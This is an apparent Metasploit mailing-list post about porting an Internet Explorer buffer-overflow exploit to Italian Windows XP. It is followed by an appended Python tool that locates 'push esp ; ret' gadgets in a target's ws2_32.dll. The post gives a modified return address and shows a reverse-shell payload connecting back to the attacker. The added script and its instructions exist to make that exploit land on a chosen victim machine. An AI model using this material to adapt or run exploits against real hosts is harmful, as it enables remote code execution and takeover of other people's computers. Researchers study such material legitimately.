Metasploit mailing list archives

Internet Explorer Object Type Overflow


From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Wed, 31 May 2006 11:17:33 +0200


Hello,
first of all I have to say I'm not a real expert in the Windows world.
While trying to exploit the Internet Explorer Object Type Overflow on a
host running Windows XP Professional SP1 through Metasploit, I realized
that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the
English version) is located at 0x71a31d54 for the Italian version, so
I modified ie_objecttype.pm this way:

"Windows XP"   => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1

When I tried to exploit the vulnerable host I saw IE crash, and on
the attacker's side this behavior:

msf ie_objecttype(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.33.162:8080 ...
[*] HTTP Client connected from 192.168.33.107:1392 using Windows XP, sending payload...
[*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393

[*] Exiting Reverse Handler.

I tried attaching OllyDbg to iexplore.exe and observed an access
violation when writing to the address 0x77e40000 (this address is in
ECX and EBX when the access violation is triggered). I suppose I'll
also need to modify the second address in the target array in order to
exit cleanly, but I'm really not skilled in the Windows world, so
hints about how to do it are really welcome.

Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header
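The locale problem described in the message above (the same `push esp ; ret` byte pair sitting at a different virtual address in the Italian ws2_32.dll because the module has a different preferred base) is something you can resolve offline instead of by hand in a debugger. The following script is an added example, not part of the original post and not Metasploit code: it parses the PE headers of a DLL, walks the section table, and reports the virtual address of every `54 C3` (`push esp ; ret`) sequence inside an executable section, assuming the module loads at its preferred ImageBase (true on XP SP1, which has no ASLR, unless the loader has to relocate it because of an address collision). The `build_sample_dll()` helper is a constructed stand-in image, not a real ws2_32.dll; its base and gadget offset were chosen to reproduce the 0x71a31d54 value from the post, and it also contains a decoy copy of the gadget in the non-executable `.data` section to show why the executable-section filter matters. It does not address the second target-array address.

```python
import struct
import sys

# Byte pattern for "push esp ; ret", the stack-pivot gadget the exploit
# needs in a DLL that loads at a fixed address on Windows XP.
PUSH_ESP_RET = b"\x54\xc3"
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe(data):
    """Return (image_base, sections) from a raw PE file image.
    Each section is (name, virtual_address, raw_pointer, raw_size, characteristics)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x10B:                                          # PE32
        image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
    elif magic == 0x20B:                                        # PE32+
        image_base = struct.unpack_from("<Q", data, opt_off + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    sec_off = opt_off + opt_size
    for i in range(num_sections):
        hdr = data[sec_off + 40 * i: sec_off + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", hdr, 8)
        chars = struct.unpack_from("<I", hdr, 36)[0]
        sections.append((name, va, raw_ptr, raw_size, chars))
    return image_base, sections


def find_gadgets(data, pattern=PUSH_ESP_RET, executable_only=True):
    """Return [(virtual_address, section_name)] for every occurrence of
    `pattern` in the image, assuming it loads at its preferred base."""
    image_base, sections = parse_pe(data)
    hits = []
    for name, va, raw_ptr, raw_size, chars in sections:
        if executable_only and not chars & IMAGE_SCN_MEM_EXECUTE:
            continue            # a pivot in a non-executable page will not run
        end = raw_ptr + raw_size
        pos = data.find(pattern, raw_ptr, end)
        while pos != -1:
            # file offset -> RVA (via the section's raw pointer) -> VA
            hits.append((image_base + va + (pos - raw_ptr), name))
            pos = data.find(pattern, pos + 1, end)
    return hits


def build_sample_dll():
    """Constructed stand-in for a DLL (not a real ws2_32.dll): two sections,
    preferred base 0x71A30000, one `push esp ; ret` in .text at RVA 0x1D54
    and a decoy copy in the non-executable .data section."""
    image_base = 0x71A30000
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)

    def sec_hdr(name, va, raw_ptr, size, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, raw_ptr,
                           0, 0, 0, 0, chars)

    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    headers += sec_hdr(b".text", 0x1000, 0x200, 0x1000, 0x60000020)
    headers += sec_hdr(b".data", 0x2000, 0x1200, 0x200, 0xC0000040)
    headers = headers.ljust(0x200, b"\0")
    text = bytearray(b"\x90" * 0x1000)                          # nop filler
    text[0xD54:0xD56] = PUSH_ESP_RET
    data = bytearray(0x200)
    data[0x10:0x12] = PUSH_ESP_RET                              # decoy, not executable
    return bytes(headers + text + data)


if __name__ == "__main__":
    # usage: python find_push_esp_ret.py ws2_32.dll   (no argument: sample image)
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dll()
    for addr, section in find_gadgets(image):
        print("0x%08x  push esp ; ret  (%s)" % (addr, section))
```

Run it against the ws2_32.dll copied from the target's System32 directory to get the address for that exact build and locale; the value is only meaningful for a module that is loaded at its preferred base, so confirm the actual base in the debugger's module list if the exploit still misses.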
